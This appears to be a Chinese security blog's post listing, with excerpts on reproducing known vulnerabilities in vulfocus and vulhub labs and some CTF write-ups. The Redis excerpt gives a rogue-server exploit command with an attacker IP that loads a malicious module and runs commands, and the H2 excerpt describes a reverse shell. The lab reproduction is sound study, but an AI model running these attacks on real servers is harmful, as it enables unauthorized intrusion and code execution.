- 博客(45)
- 收藏
- 关注
原创 libssh-cve_2018_10933-vulfocus
ibssh是一个用于访问SSH服务的C语言开发包,它能够执行远程命令、文件传输,同时为远程的程序提供安全的传输通道。server-side state machine是其中的一个服务器端状态机。在libssh的服务器端状态机中发现了一个逻辑漏洞。攻击者可以MSG_USERAUTH_SUCCESS在身份验证成功之前发送消息。这样可以绕过身份验证并访问目标SSH服务器。本来是靶机要接受MSG_USERAUTH_REQUEST,我们用seccess状态码替换了。
2024-06-23 21:58:18
339
原创 cve-2015-3306-proftpd-vulfocus
proftp是用于搭建基于ftp协议的应用软件ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。
2024-06-23 21:55:05
798
原创 Rsync未授权访问-vulfocus
Rsync是linux上文件传输的协议,如果有返回直接可以看到,部分主机使用协议的时候不会加密码,就容易造成未授权访问漏洞。
2024-06-23 21:52:50
823
原创 服务攻防-数据库安全(数据库与漏洞利用)
如果要进行安全服务的渗透,我们先需要知道这个服务是否开启了,在数据库这个部分我们的判断方法主要有以下三种:- 扫描端口:对于不同的数据库来说,使用的端口也是不一样的,虽然可以更改数据库使用的端口,但是一般都不会修改的,一般可以用在线端口扫描,或者nmap当发现的确有这个服务但是没有扫描到相应端口的时候,考虑以下情况:- 端口不对外网展示,只对固定ip开放- WAF软件- 修改了默认的端口号。
2024-06-12 13:44:13
1498
原创 H2database 未授权访问 vulhub
打开之后是一个访问的页面,我们需要用java语言驱动让这个网站主动访问其他主机并且执行命令,我们需要用到一开始写在最前面的工具进行生成rmi。我出现的一个问题就是反弹不出去,我想了想可能是要在我的外网上面java生成命令才对,但是等我反应过来,我已经把容器关掉了。在驱动选择:javax.naming.InitialContext。被反弹shell的机子:可以就用kali,或者配一台外网服务器。出现下方红色的字体就成功了,同时你的主机检测到了这个网站的访问。虚拟机:kali+docker。
2024-06-12 13:32:59
532
原创 CVE-2019-20933-influxdb未授权访问-vulhub
InfluxDB 是一个开源分布式时序、时间和指标数据库,使用 Go 语言编写,无需外部依赖。其设计目标是实现分布式和水平伸缩扩展,是 InfluxData 的核心产品。其使用 jwt 作为鉴权方式。在用户开启了认证,但未设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在 InfluxDB 中执行SQL语句。
2024-06-12 13:28:50
933
原创 CVE-2012-2122-mysql未授权访问漏洞复现-vulhub
简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入使用:kali+vulhub。
2024-06-12 13:24:19
956
原创 wooyun_2015_110216-Elasticsearch-vulfocus
ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项path.repo中,而且如果管理员不配置该选项,则默认不能使用该功能。
2024-06-10 22:49:46
592
1
原创 hadoop未授权访问命令执行漏洞复现-vulfocus
Hadoop YARN(Yet Another Resource Negotiator)的ResourceManager是集群资源管理的核心组件,负责分配和管理集群资源以及调度作业。如果ResourceManager出现未授权访问漏洞,可能允许未经认证的用户访问或操作集群资源,这可能会导致数据泄露、资源滥用或拒绝服务攻击。在这个复现中就是在组件的ui界面上出现了未授权访问漏洞。
2024-06-10 22:42:41
1931
1
原创 解决阿里云的端口添加安全组仍然无法扫描到
我用nmap扫了一下我的这个端口,发现主机是活跃的,但是有防火墙,我们列出云服务器上面的这个防火墙list,发现确实没有5566端口。这个是因为5566没有绑定相对应的服务导致的,如果用nc监控上该端口之后,就可以扫到了。在网上排除了安全组,防火墙,iptable之后,使用curl去连接本地的5566端口。添加list之后,要记得重启:- firewall-cmd –reload。发现用线上的网站扫不到这个端口,这个端口关了,但是没有更详细信息了。反应过来之后看到这些之后真的觉得自己是个呆的。
2024-06-10 22:37:05
761
原创 cve_2022_0543-redis沙盒漏洞复现 vulfocus
该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。
2024-06-10 22:33:13
808
原创 cve_2017_12635-CouchDB垂直权限绕过
在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。使用大佬给的exp(exp在顶上的参考链接里面)影响版本:小于1.7.0以及小于2.1.1。直接拿到了flag,大佬真的太强了。打开vulfocus对应靶场。
2024-06-10 22:30:14
698
原创 cve_2014_3120-Elasticsearch-rce-vulfocus靶场
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。知识点普及:1、Elasticsearch,是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。
2024-06-10 22:26:11
675
2
原创 cnvd_2015_07557-redis未授权访问rce漏洞复现-vulfocus复现
python3 redis-master.py -r 目的ip -p 目的端口 -L 47.100.167.248 -P 1111 -f RedisModulesSDK/exp.so -c "id"python3 redis-master.py -r 目的ip -p 目的端口 -L 攻击者ip -P 对应端口 -f RedisModulesSDK/exp.so -c "id"出了一个file,搜了一下是由于这个文件用python3写的,要检查一下你的服务器上是不是python版本3.0以上,用。
2024-06-10 22:19:57
1337
1
原创 通用漏洞-基于同源策略的cors与jsonp&域名接管
在csrf的学习中,我们了解到解决第三方网站采取的发包操作,最简单的策略就是同源策略sof,即为同协议,同域名,同端口,对于同源策略网站会自动检测来源,如果不是自己的网站就会主动丢弃,但是这也造成了网站无法被自己其他的文件引用,也就是说,无法在其他网站使用这个网站上面的相应服务,或者无法主动接受使用其他网站所收回的respond。一般用ping就可以查看到真实导向的域名了,如果我们可以在其导向域名过期之后抢注申请域名,就可以变相劫持域名,或者完成钓鱼。cors和jsonp回调都主要用于资源的获取。
2024-06-05 20:33:11
427
原创 CORSscanner&burp的插件jsonp-hunter&dnsub
有时候会出一些警告没引入变量之类的,用pip安装一下就可以了打开之后是这样的。
2024-06-05 20:32:17
1089
原创 通用漏洞-crlf&url重定向&拒绝服务攻击
crlf是在数据包头头部采取一些回车加换行的操作,把自己的其他代码放到数据包中去覆盖掉原本的数据的方法,常配合xss漏洞使用,这个漏洞本身的造成危害并不严重,CRLF Injection又叫HTTP响应拆分/截断(HTTP Response Splitting)简称HRS。CRLF是CR和LF两个字符的拼接,它们分别代表”回车+换行”(\r\n)“,全称为Carriage Return/Line Feed”,十六进制编码分别为0x0d和0x0a,URL编码为%0D和%0A。
2024-06-04 17:58:37
624
原创 crlfuzz&crlfsuite
都是用来检测crlf漏洞的,原理也很简单,都是提交带有回车和行换的payload去测试,总体感觉crlfuzz更好用一点,因为可以看到整个payload,crlfsuite我暂时没找到这个访问的网址在哪里。
2024-06-04 17:52:42
366
2
原创 大米cms安装&支付逻辑漏洞
链接:https://pan.baidu.com/s/1b-Z6RaFBZ6CsSIErY46Pyg?pwd=q8qq提取码:q8qq注意一下配置就可以了:php5.5+apache+mysql5.0,主要就是数据库版本要注意一下还是建议一开始就把数据库建好。
2024-06-03 14:30:55
635
2
原创 burp插件new_xp_capcha识别验证码的简易安装
大佬给了安装地址,我们直接下载百度网盘就可以,这个文件比较大400m左右,所以可以在pdd买一个一天的百度网盘会员了,要不然真的很考验心态。下完之后就是这样的,我们把python36加入一下环境变量,就可以正常使用了。选择add,选java,我这里选的是jdk8的包做的,提示。导入burpsuite中添加。我们下载一下这个jar的包。
2024-06-02 15:08:18
982
3
原创 CTFCISCN2019华北Day1 ikun 思路记录
开启靶机之后打开网址可以看见给了一个提示,找到lv6这个页面拖下去可以换页,网址为所以目标就是,在换page后的数字的每一个页面查询有没有lv6,查看页面源码可以发现js代码里面图片的命名方式是带有等级数的目标:更换page数字后,在js代码中搜索关键词/static/img/lv/lv6.png,输出找到的这个page数我们写一个python脚本完成这件事把上面的网址换成自己的就可以了可以发现在181页发现这个关键字我们跳转过去发现了lv6。
2024-05-23 11:42:36
815
原创 CTF网鼎杯2020朱雀组 thinkjava思路记录
1.代码分析BUUCTF在线评测 (buuoj.cn)打开ctf赛题之后,下载class文件,这个部分是不完整点的源码在sqldict中存在一个sql注入点,没有采用java的预编译,调用了这个的是在test中,同时,这个采用了swagger接口,这是一个测试页面的接口,我们直接尝试打开这个页面打开 网址/swagger-ui.html2.测试点1这里可以看见有三个可以测试的位置,参考源码中的文件地址,可以发现sql注入点存在在test这个测试中,我们dbName注入sql注
2024-05-23 09:45:45
1529
原创 SerializationDumper下载与使用
直接下载jar版本,从网址往下拖一下,不要用github加速,这个加速没半点p用的同时还会显示jar下载包失效。
2024-05-22 11:39:08
260
原创 ysoserial下载和使用
因为要用java打开jar格式的,所以如果下的是源文件,还需要打包,我试了试,我这个报错了,我也不知道哪里有问题。如果不报错可以自己试试打包的工作,说不定以后还有用到。所以我的建议是直接下载jar版本的。然后直接用java去运行就可以了。网址拖到下面就可以直接下载。
2024-05-22 11:24:20
1339
原创 反序列化漏洞的入门知识总结
序列化与反序列化的目的是让数据在传输和处理的时候更简单,更快,反序列化出现在多种同面向对象语言所开发的网站和软件上,比如java,php,python等等,如果有语言一个都没学的,可以先去补一下面向对象编程的概念序列化:把对象转化成字节流(java),或者字符串(php,python)和数组(php)反序列:把字节流,字符串,数组转换成对象。
2024-05-21 20:58:53
940
原创 RCE漏洞相关知识总结
RCE是命令执行和代码执行漏洞的总称,区别在于代码执行是把函数中的字符串作为相关代码进行解析,命令执行是把函数中的字符串当做操作系统中的命令执行区别在于使用的函数和把函数中的字符串的解析方式不同。
2024-05-18 14:28:44
279
原创 RCE漏洞案例-PbootCMS1.3.2
下载下来之后先看下md文件我们小皮上面设置好网站和数据库之后,在对应文件进行修改然后导入数据库文件之后我们直接打开网站我在这个时候遇到了两个问题1.一直显示php版本过低,我换了很多次都没办法2.显示没有带上php扩展gd扩展,这个我查看扩展是带了的我解决1的方法是不要带127.0.0.1这个前标去访问,改一下网站的域名,最好不要带特殊字符比如.这些的,可能容易造成浏览器的错误2的解决方法是换php的版本,我从5.5换到了7.0,终于登上 了。
2024-05-18 13:27:50
1072
原创 文件下载&读取&删除漏洞的知识总结
但是我还是摸索了点,现在官网的se版本在网上基本没有安装的帖子了,se版本在windows上面我也安装不了了,所以我是在脚本网站找到个人版,个人版安装页面可以调出来了,就是这个安装也是出了点问题,各位大佬可以自己试试。黑盒:下载可以看主要功能测试(要注意这个下载操作的url链接,要具有参数的才有机会出现漏洞,直链式的一般不会出现漏洞的),读取基本就看不出来了。由于删除操作的破坏性,一般用于重安装,比如案例里面通过删除安全锁来进行重安装,重安装可以把数据库连接到攻击者本地的主机上。等我有时间了我就给他补上。
2024-05-14 09:13:24
213
1
原创 文件读取漏洞案例-metinfo6
直接在网上搜索就可以了,这里需要注意的还是php的版本问题,这个真的很容易出问题,我的配置是php5.3+apache+mysql的组合,在安装的时候先访问install之后再设置基本内容之后就可以打开了。
2024-05-13 11:23:57
423
原创 文件包含漏洞知识总结
在代码中有包含另一个文件的地方,而这个包含文件的地方也正好是可以修改的变量,或者是攻击者可以控制的,导致了文件的查看,命令的执行等操作的实现一般用于加载特定功能的函数,在php中最常用的是include函数。
2024-05-09 15:06:56
400
1
原创 xxe案例三-phpshe
由于我实在找不到1.7,这里只能拿1.6看一看了,虽然没有漏洞,但是我们可以大致理解白盒追xxe漏洞的大致流程,要是感兴趣就可以接着看下去了。
2024-05-04 21:55:08
438
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人